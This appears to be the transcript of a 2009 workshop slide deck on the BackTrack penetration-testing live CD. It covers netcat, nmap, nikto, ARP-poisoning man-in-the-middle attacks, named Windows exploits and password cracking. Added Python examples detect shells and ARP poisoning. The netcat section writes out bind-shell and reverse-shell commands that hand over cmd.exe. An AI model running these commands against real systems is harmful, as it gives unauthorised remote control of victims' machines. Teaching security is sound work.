Workshop on BackTrack live CD

Published on January 1, 2009

Author: amiable_indian

Source: slideshare.net

Introduction to BackTrack

Local boot to remote root in just one CD

Thought for the day: “Don’t learn to hack, hack to learn”..!!! - darknet.org.uk

Kunal Sehgal [email_address]

Introduction:

BackTrack is a suite of penetration testing/vulnerability assessment tools installed on a Linux Operating System, all wrapped-up on a bootable (live) CD

The top-rated Linux live distribution focused on penetration testing

Consists of more than 300 different up-to-date tools, logically structured according to the workflow of security professionals

Rated #1 Security-Distro by insecure.org & sectools.org

Miscellaneous BT Services:

HTTP (Port: 80)

TFTP (Port: 69)

SSH (Port: 22)

VNC (Port: 5901)

Netcat:

A computer networking utility for reading from and writing to network connections on either TCP or UDP

Feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections

Bind Shell

Reverse Shell

Bind Shell (diagram): Attacker (Private IP, behind NAT) -> Internet -> Victim (Public IP)

Victim: nc -lvp 4444 -e cmd.exe

Attacker: nc -v <IP> 4444

Attacker connects to victim (incoming traffic)

Reverse Shell (diagram): Attacker (Public IP) <- Internet <- NAT <- Victim (Private IP)

Victim: nc -v <IP> 4444 -e cmd.exe

Attacker: nc -lvp 4444

Victim sends the shell (outgoing traffic)
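The two diagrams differ in which side opens the connection, and that is also what a defender sees in a host's socket table. The following added example (not code from the workshop slides) classifies a constructed netstat-style snapshot into bind-shell and reverse-shell indicators; the SHELL_BINARIES watchlist and the EPHEMERAL_MIN boundary are illustrative assumptions.

```python
"""Tell bind shells from reverse shells in a netstat-style socket snapshot.
Added example, not code from the workshop slides; SHELL_BINARIES and
EPHEMERAL_MIN are illustrative assumptions and the snapshot is constructed."""
from dataclasses import dataclass

SHELL_BINARIES = {"cmd.exe", "sh", "bash", "nc", "ncat"}  # assumed watchlist
EPHEMERAL_MIN = 32768  # assumed start of the client-side source-port range

@dataclass(frozen=True)
class Sock:
    state: str    # "LISTEN" or "ESTABLISHED"
    local: str    # "ip:port"
    remote: str   # "ip:port", or "*:*" for a listener
    process: str  # owning process name

def port_of(addr):
    return int(addr.rsplit(":", 1)[1])

def classify(snapshot):
    """Return (kind, socket) for each socket owned by a shell binary."""
    listening = {port_of(s.local) for s in snapshot if s.state == "LISTEN"}
    findings = []
    for s in snapshot:
        if s.process not in SHELL_BINARIES:
            continue
        if s.state == "LISTEN":
            # Slide pattern "nc -lvp 4444 -e cmd.exe": the shell waits for an
            # inbound connection, so it depends on unfiltered inbound traffic.
            findings.append(("bind-shell", s))
        elif s.state == "ESTABLISHED":
            # Inbound if this host also listens on the local port or the port
            # lies below the ephemeral range; otherwise the shell dialled out
            # ("nc -v <IP> 4444 -e cmd.exe"), which NAT and egress rules allow.
            lp = port_of(s.local)
            inbound = lp in listening or lp < EPHEMERAL_MIN
            findings.append(("bind-shell" if inbound else "reverse-shell", s))
    return findings

# Constructed snapshot: one waiting bind shell, one reverse shell, two benign.
SAMPLE = [
    Sock("LISTEN", "0.0.0.0:4444", "*:*", "cmd.exe"),
    Sock("ESTABLISHED", "192.168.1.20:49162", "203.0.113.5:4444", "cmd.exe"),
    Sock("LISTEN", "0.0.0.0:80", "*:*", "httpd"),
    Sock("ESTABLISHED", "192.168.1.20:49170", "203.0.113.9:443", "firefox"),
]

if __name__ == "__main__":
    for kind, s in classify(SAMPLE):
        print(f"{kind:13s} {s.process:8s} {s.local} -> {s.remote}")
```

A one-shot listener may already have closed by the time a snapshot is taken, which is why the established-connection branch falls back to the port range rather than relying on the LISTEN entry alone.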

Nmap:

A security scanner used to discover computers and services on a computer network, thus creating a "map" of the network

Capable of discovering passive services on a network despite the fact that such services aren't advertising themselves

May be able to determine various details about the remote computers. These include operating system, device type, uptime, software product used to run a service, exact version number of that product, etc.

Nikto:

A scanner which performs comprehensive tests against web servers for multiple items

Includes over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers

Not every check is a security problem, though most are

There are some "info only" type checks that look for items that may not have a security flaw, but which the webmaster or security engineer may not know are present on the server

ARP Poisoning – Man In The Middle Attack:

MAC Address: Hardware address or physical address is a quasi-unique identifier assigned to most network adapters or network interface cards (NICs) by the manufacturer for identification

Address Resolution Protocol (ARP): A method for finding a host's hardware address when only its Network Layer address is known

Ettercap: A suite for man-in-the-middle attacks on a LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks

Network using a hub (diagram): the attacker can easily sniff the data passing between sender and receiver

Network using a switch (diagram): the attacker cannot sniff any data :(

Man-in-the-middle attack (diagram): the attacker announces “Hi everyone, I’m the switch”, so the traffic between sender and receiver passes through the attacker
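The "I'm the switch" frame leaves a trace: an IP address whose MAC binding changes, and one MAC that answers for two IP addresses. The following added example (not code from the workshop slides) runs that check over a constructed stream of ARP replies; the ArpReply record and the SAMPLE capture are illustrative assumptions.

```python
"""Flag ARP poisoning indicators in a stream of ARP replies.
Added detection example, not code from the workshop slides. ArpReply and the
SAMPLE replies are constructed for illustration."""
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class ArpReply:
    ts: int   # seconds since capture start (constructed)
    ip: str   # sender protocol address the reply claims
    mac: str  # sender hardware address making the claim

class ArpMonitor:
    def __init__(self):
        self.bindings = {}                  # ip -> last MAC seen for it
        self.ips_by_mac = defaultdict(set)  # mac -> every ip it has claimed
        self.alerts = []                    # (ts, message)

    def observe(self, r):
        prev = self.bindings.get(r.ip)
        if prev is not None and prev != r.mac:
            # The gateway IP now resolves to a new MAC, so the switch forwards
            # this host's traffic there: the "I'm the switch" frame in the slide.
            self.alerts.append((r.ts, f"{r.ip} moved {prev} -> {r.mac}"))
        self.bindings[r.ip] = r.mac
        claimed = self.ips_by_mac[r.mac]
        if r.ip not in claimed:
            claimed.add(r.ip)
            if len(claimed) > 1:
                # One MAC answering for both ends is the man-in-the-middle shape;
                # legitimately multi-homed routers need an allow-list here.
                self.alerts.append((r.ts, f"{r.mac} claims {sorted(claimed)}"))

    def run(self, replies):
        for r in sorted(replies, key=lambda x: x.ts):
            self.observe(r)
        return self.alerts

# Constructed capture: two legitimate replies, then one MAC takes over both.
SAMPLE = [
    ArpReply(1, "192.168.1.1", "00:11:22:33:44:01"),   # real gateway
    ArpReply(2, "192.168.1.20", "00:11:22:33:44:20"),  # real workstation
    ArpReply(3, "192.168.1.1", "00:11:22:33:44:99"),   # poisoned: gateway
    ArpReply(4, "192.168.1.20", "00:11:22:33:44:99"),  # poisoned: workstation
]

if __name__ == "__main__":
    for ts, msg in ArpMonitor().run(SAMPLE):
        print(f"t={ts}s {msg}")
```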

Exploits:

An exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur

Frequently includes such things as forcibly gaining control of a computer system, allowing privilege escalation, or mounting a denial-of-service attack

Zero Day Exploit: A threat that tries to exploit unknown, undisclosed or unpatched computer application vulnerabilities

www.securityfocus.com & www.milw0rm.com

Exploits (contd.):

Attack / Exploit (what the vulnerability lies in):

App

Protocol

O/S

Payload (what runs once the exploit succeeds):

Add a user

Get a remote shell

GUI access

Change routing tables

Etc.

Exploit Frameworks:

A development platform for creating security tools and exploits

Used by network security professionals to perform penetration tests, by system administrators to verify patch installations, by product vendors to perform regression testing, and by security researchers worldwide

A boon for script kiddies

Windows DCOM RPC Interface Buffer Overrun:

Exploits a vulnerability in Windows OS

The issue is due to insufficient bounds checking of client DCOM object activation requests. Exploitation of this issue could result in execution of malicious instructions with Local System privileges on an affected system

www.securityfocus.com/bid/8205

Bind Shell

IE IsComponentInstalled Buffer Overflow Vulnerability:

Exploits a vulnerability in an application (MS Internet Explorer)

Microsoft Internet Explorer is prone to a remote buffer-overflow vulnerability in the 'IsComponentInstalled()' method. A successful exploit results in arbitrary code execution in the context of the user running the browser

www.securityfocus.com/bid/16870

Reverse Shell

MS Windows Graphics Rendering Engine WMF:

Exploits a vulnerability in MS Windows WMF graphics rendering engine

The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file

www.securityfocus.com/bid/16074

Passwords Hacking:

Why hack local passwords?

Install software: key loggers, trojans, etc.

Gain access to another PC, Server, Router, etc.

People re-use passwords all the time

Types of attack:

Brute-force Attack

Dictionary Attack

Rainbow Tables

Password Attack Vectors:

Online Attack: Attacking network services that require a user to log on, by guessing the correct password

Offline Attack: Attacking hash files that store encrypted passwords

Physical Access Attack: Attacking machines and other network devices, after gaining physical access

How To Hack Windows Passwords?

Available Tools: John The Ripper, Cain & Abel, Rainbow Tables

Gain access to the victim’s PC

Google Hacking:

Google hacking is a term that refers to the act of creating complex search engine queries in order to filter through large amounts of search results

In its malicious form it can be used to detect websites that are vulnerable to numerous exploits and vulnerabilities, as well as to locate private, sensitive information about others

http://johnny.ihackstuff.com

References:

www.remote-exploit.org

www.offensive-security.com

www.wikipedia.org

www.metasploit.com

www.irongeek.com

www.cirt.net/nikto2

www.sourceforge.net

www.securityfocus.com

www.darknet.org.uk

johnny.ihackstuff.com

www.oxid.it/cain.html

Questions??

Feel free to contact me:

Kunal Sehgal

Workshop Exercise: